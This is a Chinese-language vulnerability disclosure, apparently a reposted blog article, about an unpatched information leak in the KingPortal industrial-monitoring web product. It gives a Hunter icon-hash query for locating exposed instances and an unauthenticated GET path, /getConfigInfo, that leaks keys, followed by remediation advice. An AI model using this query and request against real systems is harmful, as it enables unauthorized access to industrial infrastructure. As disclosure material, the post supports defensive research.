【0day】KingPortal运行系统信息泄露漏洞【未公开|附poc】

admin 2024年5月1日19:25:01评论121 views字数 889阅读2分57秒阅读模式
0x00 免责声明

本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号团队不为此承担任何责任。

0x01 漏洞描述

【0day】KingPortal运行系统信息泄露漏洞【未公开|附poc】

随着工业互联网的迅速发展,传统的组态软件CS架构需要安装客户端、仅支持PC机、组态开发效率低、运行效果差等已满足不了市场需求。而目前工业监控领域的Web端产品,大多定制开发,维护难度大、周期长,需要工程师掌握高级语言,开发门槛高,不能有效解决Web和移动端的数据展示的综合问题。

北京亚控科技发展有限公司自主研发的KingPortal是一款纯B/S架构面向工业监控领域的web端组态产品,是大数据可视化与工业互联网技术融合的产物,KingPortal以自动化技术为起点,以信息集成为突破口,以组件为基础进行Web端可视化组态开发,远超传统CS组态软件和其他Web端产品。KingPortal具备高质量Web界面、瘦客户端、跨平台兼容、免安装、低代码等核心技术优势。

发现KingPortal运行系统存在未授权访问漏洞,泄露系统相关敏感信息,如id密钥等等,可能造成信息泄露后的未授权访问等严重危害,建议厂商尽快修复。

0x02 空间测绘
 

搜索语句
Hunter: web.similar_icon=="14138228322413032254"

【0day】KingPortal运行系统信息泄露漏洞【未公开|附poc】

0x03 漏洞复现
 

Get访问:/getConfigInfo

【0day】KingPortal运行系统信息泄露漏洞【未公开|附poc】

0x04 修复意见
 

北京亚控科技发展有限公司自主研发的KingPortal是一款纯B/S架构面向工业监控领域的web端组态产品,是大数据可视化与工业互联网技术融合的产物,KingPortal以自动化技术为起点,以信息集成为突破口,以组件为基础进行Web端可视化组态开发,远超传统CS组态软件和其他Web端产品。KingPortal具备高质量Web界面、瘦客户端、跨平台兼容、免安装、低代码等核心技术优势。

1、请联系厂商进行修复。 
2、如非必要,禁止公网访问该系统。 
3、设置白名单访问。
欢迎进群交流

【0day】KingPortal运行系统信息泄露漏洞【未公开|附poc】

原文始发于微信公众号(网安鲲为帝):【0day】KingPortal运行系统信息泄露漏洞【未公开|附poc】

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月1日19:25:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【0day】KingPortal运行系统信息泄露漏洞【未公开|附poc】http://cn-sec.com/archives/2702815.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息